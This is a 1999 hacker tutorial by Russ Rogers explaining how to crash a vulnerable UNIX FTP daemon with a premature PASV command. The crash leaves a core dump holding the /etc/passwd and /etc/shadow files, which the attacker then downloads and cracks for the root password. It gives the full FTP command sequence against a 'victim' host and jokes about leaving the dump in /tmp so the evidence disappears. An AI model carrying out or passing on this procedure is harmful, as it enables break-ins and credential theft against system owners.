Exploiting the FTP PASV Vulnerability
by Russ Rogers - 10/2/99
One of my favorite methods of accessing account names and passwords is using a PASV vulnerability that exists in the FTP daemons of
some UNIX OSes. There are patches out to close this exploit, but the system administrator has to actually be interested enough to
download the patch and install it. Failure to patch the system results in a core dump file that contains the entire /etc/passwd file
AND the /etc/shadow files. Some versions of SSLftpd have also been known to have this vulnerability.
NOTE: This exploit requires at least ONE FTP user account that is NOT anonymous. You can either get this using a sniffer, a brute
force attack, or you might already have one on the system.
Ok, the way this attack works is that it allows you to issue a premature PASV (passive mode) command. This command will crash some
variations of an FTP daemon. When the daemon crashes, it also leaves a core file that contains a complete memory dump of all the
information that resided in relevant memory prior to the crash. In our case, we want it to contain the /etc/passwd and /etc/shadow
files.
Let's start by FTP'ing into the target computer using the user name and password that we already have. Chances are that this
name/password combination is for an ordinary user, otherwise you wouldn't need this exploit. :)
% ftp ftp.victim.com
Connected to securityhorizon.com.
victim.com FTP server (Version wu-2.4.2-academ May 7 10:00:46 1999) ready.
User (victim.com:(none)): lamer
Password required for lamer.
Password: lamepwd
Once we're in, let's change directory into the /tmp directory. This will be the directory that the core file will be dumped to for
our later retrieval. Plus, since we all know that system administrators never look in here, we can be sure that the file will be
removed at the next reboot. POOF! What evidence?
FTP> cd /tmp
Now we're logged in as a normal user AND we're in the right directory. What we need to do is try to become another user so that
the FTP daemon loads the passwd and shadow files into local memory.
FTP> user root
Password required for root.
Password: wrongpass
Issuing the PASV command at the FTP prompt on vulnerable machines will now result in a core dump containing the /etc/passwd and
/etc/shadow files.
FTP> quote pasv
If the system is already patched, the command will NOT produce a core file and you will see the result "Entering passive mode".
Otherwise, it will probably kick you off the system and restart itself. At this point, you need to log back in with your user and
password.
Once you're back in, change back into the /tmp directory and issue the command to download the core file. After this, you can log
out.
FTP> cd /tmp
FTP> bin
FTP> get ./core
FTP> quit
Congrats! Now you have a perfectly good passwd and shadow file. You'll need to edit them and remove the passwd file information
from the core file and paste it into a new text file on your own machine. Then remove the encrypted password information from the
shadow file portion of the core dump and paste that information into the passwd field of your new makeshift passwd file.
Now all you need to do is run a good password cracker like John the Ripper to obtain your root password. Individual results may
vary! :-)
Hack on... Russ
http://www.securityhorizon.com
PS - Some fixes to this problem are discussed in a newsgroup thread at http://remus.prakinf.tu-ilmenau.de/ssl-users/archive9/0080.html.